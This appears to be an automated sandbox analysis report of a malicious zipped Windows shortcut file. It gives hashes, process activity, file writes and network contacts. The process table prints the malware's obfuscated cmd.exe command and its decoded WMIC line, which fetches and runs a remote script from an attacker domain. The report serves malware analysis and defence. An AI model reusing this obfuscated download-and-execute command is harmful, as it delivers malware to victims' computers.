File name: | Doc_documento_PRC2019008850.lnk.zip |
Full analysis: | https://app.any.run/tasks/56ad4bd3-be58-483e-91cf-93562e2df962 |
Verdict: | Malicious activity |
Analysis date: | April 25, 2019, 18:11:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | C02D776CC8A47FD0F5EC4A7241E5DAC8 |
SHA1: | 6014601C801D7B731EAD888394A4DF1C82AE0679 |
SHA256: | C5FBE5856E0DC42EC26CD54A0249033F9BE3E80357FA5BAAADD75F629FC7ED87 |
SSDEEP: | 24:8fNZIjKY6vSgErlthKGS4078JL85n+KlvCNg/fM:SvfErlLbS4K8Jgskvmgc |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:04:25 20:08:06 |
ZipCRC: | 0x1730b459 |
ZipCompressedSize: | 950 |
ZipUncompressedSize: | 3132 |
ZipFileName: | Doc_documento_PRC2019008850.lnk |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2536 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Doc_documento_PRC2019008850.lnk.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3460 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\cmd.exe" | C:\Program Files\Notepad++\notepad++.exe | explorer.exe | |
User: admin Company: Don HO [email protected] Integrity Level: MEDIUM Description: Notepad++ : a free (GNU) source code editor Exit code: 0 Version: 7.51 | ||||
3484 | "C:\Program Files\Notepad++\updater\gup.exe" -v7.51 | C:\Program Files\Notepad++\updater\gup.exe | notepad++.exe | |
User: admin Company: Don HO [email protected] Integrity Level: MEDIUM Description: GUP : a free (LGPL) Generic Updater Exit code: 0 Version: 4.1 | ||||
2768 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\cmd.exe" | C:\Program Files\Notepad++\notepad++.exe | explorer.exe | |
User: admin Company: Don HO [email protected] Integrity Level: MEDIUM Description: Notepad++ : a free (GNU) source code editor Exit code: 0 Version: 7.51 | ||||
4056 | "C:\Windows\System32\cmd.exe" /V /C "set x=C[1323]:\\[1323]Wi[1323]nd[1323]ow[1323]s\\s[1323]ys[1323]te[1323]m3[1323]2[1323]\\[1323]wbe[1323]m\\W[1323]M[1323]I[1323]C.e[1323]x[1323]e o[1323]s g[1323]e[1323]t HHK[1323]r[1323]m[1323]c[1323]m[1323]x[1323]i[1323], or[1323]g[1323]an[1323]iz[1323]at[1323]io[1323]n /[1323]form[1323]at:"h[1323]t[1323]t[1323]p[1323]:[1323]/[1323]/Kc[1323]z[1323]v[1323]v[1323]j[1323]e[1323]d[1323]2[1323].c[1323]hr[1323]om[1323]iu[1323]nx[1323]js[1323]t.[1323]sit[1323]e:2[1323]505[1323]0/0[1323]4/?[1323]1[1323]3[1323]7[1323]0[1323]2[1323]5[1323]0[1323]5[1323]0[1323]L[1323]SK[1323]qc[1323]xm[1323]vv[1323]" &&echo %x:[1323]=%|C:\Windows\system32\cmd.exe" | C:\Windows\System32\cmd.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2148 | C:\Windows\system32\cmd.exe /S /D /c" echo %x:[1323]=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2792 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1472 | C:\\Windows\\system32\\wbem\\WMIC.exe os get HHKrmcmxi, organization /format:"http://Kczvvjed2.chromiunxjst.site:25050/04/?137025050LSKqcxmvv" | C:\Windows\system32\wbem\WMIC.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 44210 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2536 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2536.42352\Doc_documento_PRC2019008850.lnk | lnk | |
MD5:01227B06022DF6092AE9EF6737AF2395 | SHA256:F88680DFC0F3CBC9EC66231FAC936888AD737F78116F5B0F5D2B0D769C0EF7AF | |||
2768 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\config.xml | xml | |
MD5:0592DE4EC69FAE006D3A55A0C522C6CA | SHA256:1D894E5FAF877F16DC2886B0667F624BD0199825F5B951115D61F8A3AE5C2B38 | |||
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\session.xml | text | |
MD5:4DF06A3367C04439C0C3BB6EDA8A30EF | SHA256:4F719FE0608CE5C43D31A48B36D3938CE444D897CF77BB92596DCA23363BB19B | |||
2768 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\session.xml | text | |
MD5:90775F632F2113623F9BE3FF49B2A026 | SHA256:F9F0800278CABCEE1D7CCF8D12EBAED9D2171594C5FD23954FA35CE30A26081A | |||
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\config.xml | xml | |
MD5:2C259C204983D0A1BF469E9B95AD1BF2 | SHA256:AE0AAE595C529BCA88D249358DB898243BC2C3BFE49D1D44ABED8A6D4ADC7E29 | |||
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\plugins\Config\converter.ini | text | |
MD5:F70F579156C93B097E656CABA577A5C9 | SHA256:B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4 | |||
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\langs.xml | xml | |
MD5:E792264BEC29005B9044A435FBA185AB | SHA256:5298FD2F119C43D04F6CF831F379EC25B4156192278E40E458EC356F9B49D624 | |||
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml | xml | |
MD5:44982E1D48434C0AB3E8277E322DD1E4 | SHA256:3E661D3F1FF3977B022A0ACC26B840B5E57D600BC03DCFC6BEFDB408C665904C | |||
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\shortcuts.xml | text | |
MD5:AD21A64014891793DD9B21D835278F36 | SHA256:C24699C9D00ABDD510140FE1B2ACE97BFC70D8B21BF3462DED85AFC4F73FE52F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 2.21.242.197:80 | http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D | NL | der | 1.37 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3484 | gup.exe | 37.59.28.236:443 | notepad-plus-plus.org | OVH SAS | FR | whitelisted |
1472 | WMIC.exe | 35.222.129.65:25050 | kczvvjed2.chromiunxjst.site | — | US | unknown |
1472 | WMIC.exe | 35.198.7.231:25050 | kczvvjed2.chromiunxjst.site | Google Inc. | US | suspicious |
— | — | 2.21.242.197:80 | isrg.trustid.ocsp.identrust.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
---|---|---|
notepad-plus-plus.org |
| whitelisted |
isrg.trustid.ocsp.identrust.com |
| whitelisted |
kczvvjed2.chromiunxjst.site |
| suspicious |
dns.msftncsi.com |
| shared |
Process | Message |
---|---|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
|